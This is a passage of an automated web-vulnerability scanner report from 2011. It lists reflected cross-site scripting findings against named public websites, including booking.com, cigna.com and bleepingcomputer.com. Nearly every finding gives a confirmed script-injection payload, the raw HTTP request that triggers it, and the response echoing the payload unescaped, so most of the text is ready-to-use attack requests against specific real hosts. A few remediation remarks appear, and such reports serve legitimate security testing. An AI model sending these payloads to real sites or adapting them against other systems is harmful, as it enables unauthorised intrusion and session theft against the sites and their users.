Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
Set-Cookie: bg_id=26df00770e5294cd9d509d8e8d6f08a5; path=/; domain=.biblegateway.com
Content-Length: 18836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>BibleGateway.com - W
...[SNIP]...
<input type="text" size="40" name="request" value="http://www.biblegateway.com/favicon.ico24317"><script>alert(1)</script>121a4b3f1d5" />
...[SNIP]...

1.11. http://www.biblegateway.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.biblegateway.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 9e862--><script>alert(1)</script>d9a6c1b138b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico9e862--><script>alert(1)</script>d9a6c1b138b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.biblegateway.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Thu, 31 Mar 2011 20:28:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
Set-Cookie: bg_id=00768eecf88580efeb61ab9e63891c1e; path=/; domain=.biblegateway.com
Content-Length: 18838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>BibleGateway.com - W
...[SNIP]...
<input type="text" size="40" name="request" value="/favicon.ico9e862--><script>alert(1)</script>d9a6c1b138b" />
...[SNIP]...

1.12. http://www.blackplanet.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackplanet.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71013"><script>alert(1)</script>5a152d520dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /71013"><script>alert(1)</script>5a152d520dc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blackplanet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:45:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.4
Edge-control: no-store
Page-Name: /71013"><script>alert(1)</script>5a152d520dc
Set-Cookie: user_guid=d41d8cd98f00b204e9800998ecf8427e.4d94e7e04fe167.63170077; path=/
Cache-Control: no-cache, no-store, private
Content-Type: text/html; charset=utf-8
Content-Length: 83193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<base href="http://www.blackplanet.com/71013"><script>alert(1)</script>5a152d520dc" />
...[SNIP]...

1.13. http://www.bleepingcomputer.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bleepingcomputer.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b2e2"><script>alert(1)</script>5d9dc54262b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico5b2e2"><script>alert(1)</script>5d9dc54262b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bleepingcomputer.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 21:19:14 GMT
Server:
Set-Cookie: session_id=ad88f0a6310c49a4fed5c4f4ab60d3e9; path=/; domain=.bleepingcomputer.com; httponly
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 24835


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Bleeping Computer - Computer Help and Discussion</title>
<meta name="Description" content="A free web based commun
...[SNIP]...
<form action="http://www.bleepingcomputer.com/forums/index.php?app=core&amp;module=global&amp;section=login&amp;do=process&return=http://www.bleepingcomputer.com/favicon.ico5b2e2"><script>alert(1)</script>5d9dc54262b" method="post">
...[SNIP]...

1.14. http://www.bleepingcomputer.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bleepingcomputer.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f32fc'><script>alert(1)</script>bba725bdb52 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof32fc'><script>alert(1)</script>bba725bdb52 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bleepingcomputer.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 21:19:14 GMT
Server:
Set-Cookie: session_id=7a5bbe88b5e7a2147978182e0a1c3ec1; path=/; domain=.bleepingcomputer.com; httponly
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 24835


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Bleeping Computer - Computer Help and Discussion</title>
<meta name="Description" content="A free web based commun
...[SNIP]...
<a href='http://www.bleepingcomputer.com/forums/index.php?app=core&amp;module=global&amp;section=login&amp;return=http://www.bleepingcomputer.com/favicon.icof32fc'><script>alert(1)</script>bba725bdb52'>
...[SNIP]...

1.15. http://www.blurtit.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blurtit.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9e65"><script>alert(1)</script>620768afb08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc9e65"><script>alert(1)</script>620768afb08 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blurtit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:11:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By:
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 31 Mar 2011 20:11:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: PHPSESSID=dq1g89g85b8kvvplgvo8cj2ra3; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 16335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="large_modal" script="/zone.php" return="/favicon.icoc9e65"><script>alert(1)</script>620768afb08" resource="">
...[SNIP]...

1.16. http://www.blurtit.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blurtit.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a4b9'-alert(1)-'d0f76f80b1c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico7a4b9'-alert(1)-'d0f76f80b1c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blurtit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:11:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By:
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 31 Mar 2011 20:11:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: PHPSESSID=1bi56uchjdrdvhnk578piesa95; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 16305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
hEngine(
           "http://www.blurtit.com/inc/"+name+".src",
           "http://www.blurtit.com/inc/"+name+"."+ext,
           name,cat);
       
   }
   else{
       errorMsg(name,ext,cat);
   }
}
var currentPage = '/favicon.ico7a4b9'-alert(1)-'d0f76f80b1c';
//-->
...[SNIP]...

1.17. http://www.booking.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e7d1"><script>alert(1)</script>0f5d76ea955 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico7e7d1"><script>alert(1)</script>0f5d76ea955 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.booking.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:27:09 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from www.booking.com
Content-Length: 38532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                                                                                                                                               
...[SNIP]...
<meta property="og:url" content="http://www.booking.com/favicon.ico7e7d1"><script>alert(1)</script>0f5d76ea955" />
...[SNIP]...

1.18. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload b16ef</title><script>alert(1)</script>7bedde40a4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b16ef</title><script>alert(1)</script>7bedde40a4e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzillions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:49:32 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Sun, 28-Mar-2021 20:49:32 GMT; Path=/
Set-Cookie: lapg=%2Fb16ef%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7bedde40a4e%3FN%3D0%26D%3Dx%26Ntt%3Db16ef%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7bedde40a4e%26top%3Dyes; Expires=Sun, 28-Mar-2021 20:49:32 GMT; Path=/
Set-Cookie: oref=""; Expires=Sun, 28-Mar-2021 20:49:32 GMT; Path=/
Set-Cookie: bzid=1301604572331; Expires=Sun, 28-Mar-2021 20:49:32 GMT; Path=/
Set-Cookie: JSESSIONID=FA808F403BB58638211C1F9F3FE8BA45.snowbird1portal; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 25245

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<title>Buzzillions.com - Search for &#8220;b16ef</title><script>alert(1)</script>7bedde40a4e&#8221;</title>
...[SNIP]...

1.19. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 48aa3<script>alert(1)</script>bead1ad8bed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /48aa3<script>alert(1)</script>bead1ad8bed HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzillions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:49:31 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Sun, 28-Mar-2021 20:49:31 GMT; Path=/
Set-Cookie: lapg=%2F48aa3%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebead1ad8bed%3FN%3D0%26D%3Dx%26Ntt%3D48aa3%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebead1ad8bed%26top%3Dyes; Expires=Sun, 28-Mar-2021 20:49:31 GMT; Path=/
Set-Cookie: oref=""; Expires=Sun, 28-Mar-2021 20:49:31 GMT; Path=/
Set-Cookie: bzid=1301604571532; Expires=Sun, 28-Mar-2021 20:49:31 GMT; Path=/
Set-Cookie: JSESSIONID=12EE78DFD38C74A2B7286ADA4AE4FBB8.furyportal; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28435

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<span style="color: #74B74A);" class="bz-emphasize">"48aa3<script>alert(1)</script>bead1ad8bed"</span>
...[SNIP]...

1.20. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39f27'%3balert(1)//896becadf55 was submitted in the REST URL parameter 1. This input was echoed as 39f27';alert(1)//896becadf55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /39f27'%3balert(1)//896becadf55 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzillions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:49:30 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Sun, 28-Mar-2021 20:49:30 GMT; Path=/
Set-Cookie: lapg=%2F39f27%27%3FN%3D0%26D%3Dx%26Ntt%3D39f27%27%3Balert%281%29%2F%2F896becadf55%26top%3Dyes; Expires=Sun, 28-Mar-2021 20:49:30 GMT; Path=/
Set-Cookie: oref=""; Expires=Sun, 28-Mar-2021 20:49:30 GMT; Path=/
Set-Cookie: bzid=1301604570744; Expires=Sun, 28-Mar-2021 20:49:30 GMT; Path=/
Set-Cookie: JSESSIONID=A48E164E0F5B257F3EEBDB03DACB82C0.snowbirdportal; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24886

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<script>bZ.events.handlers.zeroResults('39f27';alert(1)//896becadf55');</script>
...[SNIP]...

1.21. http://www.calorie-count.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.calorie-count.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27992<script>alert(1)</script>3ee2a973ae2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico27992<script>alert(1)</script>3ee2a973ae2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.calorie-count.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 22:04:04 GMT
Server: Apache
Content-Length: 2486
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 - Page Not Found</title>
<style type="text/css">
body {
   background-color: #F2EFE8;
   font-family: verdana, sans-serif
...[SNIP]...
<strong>http://www.calorie-count.com/favicon.ico27992<script>alert(1)</script>3ee2a973ae2</strong>
...[SNIP]...

1.22. http://www.calorie-count.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.calorie-count.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 723b2<script>alert(1)</script>9675ca470f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?723b2<script>alert(1)</script>9675ca470f6=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.calorie-count.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 22:04:04 GMT
Server: Apache
Content-Length: 2489
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 - Page Not Found</title>
<style type="text/css">
body {
   background-color: #F2EFE8;
   font-family: verdana, sans-serif
...[SNIP]...
<strong>http://www.calorie-count.com/favicon.ico?723b2<script>alert(1)</script>9675ca470f6=1</strong>
...[SNIP]...

1.23. http://www.caringbridge.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caringbridge.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1900"><script>alert(1)</script>2b16e35a3d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoa1900"><script>alert(1)</script>2b16e35a3d2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.caringbridge.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:24:11 GMT
Server: Apache
Set-Cookie: lang=en; path=/
Cache-Control: max-age=0
Expires: Thu, 31 Mar 2011 20:24:11 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 9848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The Page You Requested Was N
...[SNIP]...
<a href="/favicon.icoa1900"><script>alert(1)</script>2b16e35a3d2/es">
...[SNIP]...

1.24. http://www.cigna.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cigna.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7166d<script>alert(1)</script>6e81a71c694 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico7166d<script>alert(1)</script>6e81a71c694 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cigna.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Thu, 31 Mar 2011 21:47:45 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/favicon.ico7166d<script>alert(1)</script>6e81a71c694</b>
...[SNIP]...

1.25. http://www.cliffsnotes.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cliffsnotes.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 770aa<script>alert(1)</script>5b41d12322e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico770aa<script>alert(1)</script>5b41d12322e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cliffsnotes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Thu, 31 Mar 2011 20:54:02 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=C3454D01B13A16623CC64F9B778D9FD5; Path=/
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<i>/WileyCDA//favicon.ico770aa<script>alert(1)</script>5b41d12322e</i>
...[SNIP]...

1.26. http://www.colbertnation.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.colbertnation.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2467"><script>alert(1)</script>d749514c894 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe2467"><script>alert(1)</script>d749514c894 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.colbertnation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.1
X-Powered-By: PHP/5.3.1
Accept-ESI: 1.0
Content-Type: text/html
Content-Length: 24243
Cache-Control: max-age=3550
Date: Thu, 31 Mar 2011 20:59:52 GMT
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <he
...[SNIP]...
<link rel="canonical" href="http://www.colbertnation.com/favicon.icoe2467"><script>alert(1)</script>d749514c894" />
...[SNIP]...

1.27. http://www.computerhope.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.computerhope.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1890"><a>449e9cf15fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /a1890"><a>449e9cf15fa HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.computerhope.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 22:04:43 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Vary: User-Agent,Accept-Encoding
Content-Length: 7651
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<title>404 error</title>
<meta name="robots" content="noindex, nofollow"
...[SNIP]...
<input type="text" name="q" size="15" value="a1890"><a>449e9cf15fa" class="bsbar">
...[SNIP]...

1.28. http://www.convertunits.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.convertunits.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a568d<script>alert(1)</script>6602233ab9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoa568d<script>alert(1)</script>6602233ab9f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.convertunits.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 21:47:05 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 9558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
lang="en" xmlns:v="urn:schemas-m
...[SNIP]...
<p>http://www.convertunits.com/favicon.icoa568d<script>alert(1)</script>6602233ab9f</p>
...[SNIP]...

1.29. http://www.craveonline.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.craveonline.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a53bb'-alert(1)-'6c32132cf1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icoa53bb'-alert(1)-'6c32132cf1e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craveonline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2
Status: 404 Not Found
